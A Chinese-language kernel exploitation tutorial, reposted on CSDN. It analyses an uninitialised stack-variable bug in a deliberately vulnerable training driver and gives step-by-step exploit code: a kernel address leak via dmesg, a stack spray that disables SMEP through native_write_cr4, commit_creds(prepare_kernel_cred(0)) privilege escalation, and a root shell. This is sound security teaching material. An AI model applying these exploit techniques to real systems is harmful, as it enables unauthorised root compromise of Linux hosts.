c++ 导入stack 头文件 stack未申明_linux内核提权系列教程(3):栈变量未初始化漏洞...

一、 漏洞分析1. 程序分析总共两个驱动号,对应两个功能。case UNINITIALISED_STACK_ALLOC:{ ret = copy_to_stack((char*)p_arg);break;}case UNINITIALISED_STACK_USE:{ use_obj_args use_obj_arg;...
摘要由CSDN通过智能技术生成

              e9bac01c2a0da39a36fc2d806d3da10c.gif


一、 漏洞分析

1. 程序分析

总共两个驱动号,对应两个功能。

case UNINITIALISED_STACK_ALLOC:{            ret = copy_to_stack((char*)p_arg);break;}case UNINITIALISED_STACK_USE:{            use_obj_args use_obj_arg;if(copy_from_user(&use_obj_arg, p_arg, sizeof(use_obj_args)))return-EINVAL;            use_stack_obj(&use_obj_arg);break;}

第1个功能->UNINITIALISED_STACK_ALLOC

// 布置内核栈: 能往内核栈上传入4096字节的数据#define BUFF_SIZE 4096noinline staticint copy_to_stack(char __user *user_buff){int ret;char buff[BUFF_SIZE];        ret = copy_from_user(buff, user_buff, BUFF_SIZE);        buff[BUFF_SIZE - 1] = 0;return ret;}

第2个功能-> UNINITIALISED_STACK_USE

// 使用内核栈: 初始化内核栈数据noinline staticvoid use_stack_obj(use_obj_args *use_obj_arg){volatile stack_obj s_obj; //volatile表示要求编译器不要对该变量作任何优化if(use_obj_arg->option == 0){            s_obj.fn = uninitialised_callback;            s_obj.fn_arg = use_obj_arg->fn_arg;}        s_obj.fn(s_obj.fn_arg);}
// 结构typedefstruct stack_obj {int do_callback;long fn_arg;void(*fn)(long);char buff[48];}stack_obj;typedefstruct use_obj_args{int option;long fn_arg;}use_obj_args;

2. 漏洞分析

漏洞:只有(use_obj_arg->option == 0)时,才会初始化stack_obj对象。

利用:构造(use_obj_arg->option != 0),产生内核栈变量未初始化引用错误。本驱动其实简化了漏洞利用过程,因为可以直接利用驱动号UNINITIALISED_STACK_ALLOC来布置内核栈,不需要考虑用系统调用来布置。


二、 漏洞利用

1. 利用步骤

完整代码见exp_uninitialised_stack.c

(1)单核执行
//step 1: 让程序只在单核上运行,以免只关闭了1个核的smep,却在另1个核上跑shellvoid force_single_core(){cpu_set_t mask;    CPU_ZERO(&mask);    CPU_SET(0,&mask);if(sched_setaffinity(0,sizeof(mask),&mask))        printf("[-----] Error setting affinity to core0, continue anyway, exploit may fault \n");return;}
(2)泄露内核基址
// step 2: 构造 page_fault 泄露kernel地址。从dmesg读取后写到/tmp/infoleak,再读出来pid_t pid=fork();if(pid==0){        do_page_fault();exit(0);}int status;    wait(&status);    // 等子进程结束//sleep(10);    printf("[+] Begin to leak address by dmesg![+]\n");size_t kernel_base = get_info_leak()-sys_ioctl_offset;    printf("[+] Kernel base addr : %p [+] \n", kernel_base);
(3)关闭smep

利用UNINITIALISED_STACK_ALLOC功能在内核栈上布置目标函数和所需参数,这样在发生栈变量未初始化使用时就会触发执行目标函数。

// step 3: 关闭smepchar buf[4096];    memset(buf, 0, sizeof(buf));struct use_obj_args use_obj={.option=1,.fn_arg=1337,};for(int i=0; i<4096; i+=16){        memcpy(buf+i, &fake_cr4, 8);   // 注意是fake_cr4所在地址        memcpy(buf+i+8, &native_write_cr4_addr, 8);  // 注意是native_write_cr4_addr所在地址}    ioctl(fd,UNINITIALISED_STACK_ALLOC, buf);    ioctl(fd,UNINITIALISED_STACK_USE, &use_obj);
(4)提权—commit_creds(prepare_kernel_cred(0))
// step 4: 提权,执行get_root();  注意是把get_root()的地址拷贝过去,转一次size_t get_root_addr = &get_root;    memset(buf, 0, sizeof(buf));for(int i=0; i<4096; i+=8)        memcpy(buf+i, &get_root_addr, 8);    ioctl(fd,UNINITIALISED_STACK_ALLOC, buf);    ioctl(fd,UNINITIALISED_STACK_USE, &use_obj);
(5)返回shell
// step 5: 获得shellif(getuid()==0){        printf("[+] Congratulations! You get root shell !!! [+]\n");        system("/bin/sh");}

2. 利用结果

成功提权:

78114585a89cad2760812974270d3d96.png
1-exp_uninitialised_stack_succeed.png

参考:

https://invictus-security.blog/2017/06/

https://github.com/invictus-0x90/vulnerable_linux_driver

文章首发于先知-linux内核提权系列教程(3):栈变量未初始化漏洞[1]

说明:实验所需的驱动源码、bzImage、cpio文件见我的github[2]进行下载。

本教程适合对漏洞提权有一定了解的同学阅读,具体可以看看我先知之前的文章,或者我的简书[3]

References

[1] 先知-linux内核提权系列教程(3):栈变量未初始化漏洞: https://xz.aliyun.com/t/6301[2] 我的github: https://github.com/bsauce/kernel_exploit_series[3] 我的简书: https://www.jianshu.com/u/a12c5b882be2

往期推荐

linux内核提权系列教程(2):任意地址读写到提权的4种方法

CVE-2017-17562 GoAhead远程代码执行漏洞分析

D-Link service.cgi远程命令执行漏洞分析

linux内核提权系列教程(1):堆喷射函数sendmsg与msgsend利用

ddc7e3ce8643c5736960e0fd73775ae6.png
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值